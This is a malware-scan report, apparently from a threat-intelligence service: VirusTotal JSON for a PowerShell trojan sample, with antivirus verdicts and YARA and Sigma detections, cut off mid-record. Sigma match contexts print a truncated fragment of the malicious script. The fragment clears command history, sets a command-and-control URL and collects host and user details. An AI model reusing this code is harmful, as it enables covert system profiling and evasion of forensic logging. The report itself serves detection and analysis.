465a6e816b9e140e3c7cdfb2a4464d6f
Hash
- MD5: 465a6e816b9e140e3c7cdfb2a4464d6f
- SHA1: 542c9c7536b8f9f7b6aff9583274277af685fc82
- SHA256: 50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65
- First Seen: 2026-06-20
- Last Seen: 2026-06-20
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65"
},
"attributes": {
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 4,
"medium": 8,
"low": 3
}
},
"tags": [
"long-sleeps",
"powershell",
"persistence",
"detect-debug-environment"
],
"type_extension": "ps1",
"first_submission_date": 1781803181,
"md5": "465a6e816b9e140e3c7cdfb2a4464d6f",
"javascript_info": {
"tags": [
"malformed"
]
},
"magika": "POWERSHELL",
"crowdsourced_yara_results": [
{
"ruleset_id": "0001fae807",
"ruleset_version": "0001fae807|1d926845269a3ac8de0431da133950390b5cced3",
"ruleset_name": "gen_powershell_susp",
"rule_name": "Suspicious_PowerShell_WebDownload_1",
"match_date": 1781830670,
"description": "Detects suspicious PowerShell code that downloads from web sites",
"author": "Florian Roth (Nextron Systems)",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "0121cb9684",
"ruleset_version": "0121cb9684|589bbefc22847193cac455858fa15e627d671918",
"ruleset_name": "Base64_Encoded_Powershell_Directives",
"rule_name": "Base64_Encoded_Powershell_Directives",
"match_date": 1781830670,
"description": "This signature detects base64 encoded Powershell directives.",
"author": "InQuest Labs",
"source": "https://github.com/InQuest/yara-rules-vt"
}
],
"tlsh": "T1B4422C27CEC72D54CB71453520EE18E11A5D23AF21B10EEE660FEADD4EEA17640CA1F9",
"last_analysis_stats": {
"malicious": 7,
"suspicious": 0,
"undetected": 42,
"harmless": 0,
"timeout": 10,
"confirmed-timeout": 0,
"failure": 2,
"type-unsupported": 13
},
"type_description": "Powershell",
"last_submission_date": 1781803181,
"type_tag": "powershell",
"last_modification_date": 1781837869,
"unique_sources": 1,
"magic": "ASCII text, with very long lines (12531u)",
"sha1": "542c9c7536b8f9f7b6aff9583274277af685fc82",
"times_submitted": 1,
"popular_threat_classification": {
"popular_threat_category": [
{
"value": "trojan",
"count": 2
}
],
"suggested_threat_label": "trojan.boxter/horse",
"popular_threat_name": [
{
"value": "boxter",
"count": 4
},
{
"value": "horse",
"count": 1
}
]
},
"reputation": 0,
"filecondis": {
"raw_md5": "294398f96539426302375affca11cab5",
"dhash": "ecb6cc8c8c8c9488"
},
"last_analysis_results": {
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260618",
"category": "malicious",
"result": "CMD:Heur.BZC.PZQ.Boxter.1233.998D9884"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.239",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260617",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.58.59868",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.58.59867",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1231",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260618",
"category": "malicious",
"result": "Trojan Horse"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26050.11",
"engine_update": "20260618",
"category": "malicious",
"result": "Trojan:Script/Wacatac.B!ml"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5625",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.15146",
"engine_update": "20260619",
"category": "malicious",
"result": "ti!50EAE63D3E24"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260618",
"category": "malicious",
"result": "CMD:Heur.BZC.PZQ.Boxter.1233.998D9884 (B)"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1781823697",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38740",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260618",
"category": "malicious",
"result": "CMD:Heur.BZC.PZQ.Boxter.1233.998D9884"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107653",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44961AVA:64.31441",
"engine_update": "20260619",
"category": "malicious",
"result": "CMD:Heur.BZC.PZQ.Boxter.1233.998D9884"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.1.10706",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-18.02",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "eb947ba:eb947ba:1e47ea2:1e47ea2",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "undetected",
"result": null
},
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": null,
"engine_update": "20260617",
"category": "timeout",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260619",
"category": "timeout",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": null,
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260619",
"category": "timeout",
"result": null
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": null,
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260618",
"category": "timeout",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260614",
"category": "failure",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260618",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260617-00",
"engine_update": "20260617",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.265",
"engine_update": "20260617",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.789",
"engine_update": "20260616",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260618",
"category": "type-unsupported",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.3.2",
"engine_update": "20260608",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
}
},
"names": [],
"sigma_analysis_stats": {
"critical": 0,
"high": 4,
"medium": 8,
"low": 3
},
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "1acd404f36bb172d4812ef78feee2cd5dfbedae08997d90ed4ef4048b6ec5964",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Axios NPM Compromise File Creation Indicators - Windows",
"rule_description": "Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.\nOn March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.\nThe dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.\nThe attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\ProgramData\\system.bat"
}
},
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\ProgramData\\system.bat"
}
}
]
},
{
"rule_level": "high",
"rule_id": "30041403950554ea68cae8436931add62874ca499364d423bd04a8ccb124d999",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Clearing Windows Console History",
"rule_description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.",
"rule_author": "Austin Songer @austinsonger",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "7d262d8417cb03b2a9d2b935ae55980f22abc3aa7cffc36e57eda761068226dc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "c50b384b3d0f5d468c48abf6ac8fd6095727405ed00d170aeadf0fc1b4add34b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "HackTool - Powerup Write Hijack DLL",
"rule_description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n",
"rule_author": "Subhash Popuri (@pbssubhash)",
"match_context": [
{
"values": {
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\ProgramData\\system.bat"
}
},
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\ProgramData\\system.bat"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "098155535b5f140a45c1a07ea729542903d8e4bb81674f7e3a5636d6d121422d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potentially Suspicious DMP/HDMP File Creation",
"rule_description": "Detects the creation of a file with the \".dmp\"/\".hdmp\" extension by a shell or scripting application such as \"cmd\", \"powershell\", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0x10000_dump.dmp"
}
},
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0x20000_dump.dmp",
"EventID": "11"
}
},
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0x50000_dump.dmp"
}
},
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0x60000_dump.dmp"
}
},
{
"values": {
"RuleName": "Downloads",
"Image": "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\azure\\Downloads\\0xe0000_dump.dmp",
"EventID": "11"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "41a3e620fba7b86366fe885ba1b20dbaae2be7596e2e9b194ab65dae5e4a7b53",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Unsigned Image Loaded Into LSASS Process",
"rule_description": "Loading unsigned image (DLL, EXE) into LSASS process",
"rule_author": "Teymur Kheirkhabarov, oscd.community",
"match_context": [
{
"values": {
"Hashes": "SHA1=ECC47D6C0C4C69D00D2FBA78EFD961C27E32A367,MD5=543AC8C5727EE9F5A83508023257A9E7,SHA256=0BF011593B5CFF9F46909E5998786E30D98440BFFE7251163570CA11CD38E07C,IMPHASH=70A44A432BB24E5D2BF607FE8361DE51",
"SignatureStatus": "Unavailable",
"ImageLoaded": "C:\\p250ps71\\dll\\QaujNuvS.dll",
"Signed": "false",
"Image": "C:\\Windows\\System32\\lsass.exe",
"EventID": "7"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"Path": "",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "4aaedea9-9b4a-4da3-9ce8-a45b79c701c0",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "7cc67d2e-28e7-4afa-8a49-3d46b9b76bed",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "Remove-Item (Get-PSReadLineOption).HistorySavePath -Force\r\nSet-PSReadLineOption -HistorySaveStyle SaveNothing\r\n\r\n$url = \"https://maskasd.com/8555575039\"\r\n$uid = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 16 | ForEach-Object { [char]$_ })\r\n$os = Get-CimInstance Win32_OperatingSystem\r\n$username = $env:USERNAME\r\n$hostname = $env:COMPUTERNAME\r\n$timezone = \"UTC \" + $((Get-TimeZone).BaseUtcOffset.TotalHours) + \" hours\"\r\n$bootTime = [int64][DateTimeOffset]::new([DateTime]::SpecifyKind($ [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "bfa2fbac-303b-41c5-9bad-23d189967fe1",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
